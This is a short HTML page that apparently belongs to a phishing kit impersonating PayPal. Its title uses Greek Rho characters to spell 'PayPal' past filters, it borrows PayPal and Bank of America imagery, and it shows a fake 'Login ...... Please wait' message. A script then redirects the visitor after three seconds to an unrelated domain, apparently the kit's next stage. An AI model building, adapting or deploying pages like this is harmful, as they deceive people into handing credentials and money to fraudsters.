<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>&Rho;ay&Rho;al: Make and Accept Payments</title>
 
<link rel="icon" href="http://img110.xooimage.com/views/e/1/5/icon-4da6a8f.png/">
</head>
<style>
body { 
background-image: url("https://www.bac-assets.com/hp-assets/spa-assets/images/assets-images-site-hp-assets-mastheads-online-banking-OLB_Masthead_ARNVGB4K_1440.webp");
background-repeat: no-repeat;
background-size:100% 100%;
}



</style>
<center> <img style="margin-top:200px;" src="http://www.devopsdays.org/events/2015-singapore/logos/paypal.png"  class="center" width="200px" height="200px"></center>
<center><td class="iPhone_font" style="font-family: 'Lucida Grande', Helvetica, Arial, sans-serif; line-height: 18px; text-align: center;
                             font-size: 14px; color: #333; padding: 17px 0 0 0; font-smooth: always; -webkit-font-smoothing: antialiased;">
Login ...... Please wait .
                              </td></center>
 <script type="text/javascript">
        window.setTimeout("location=('http://counterpartstudies.com/css/');", 3000);
    </script>
<body>
</body>
 
</html>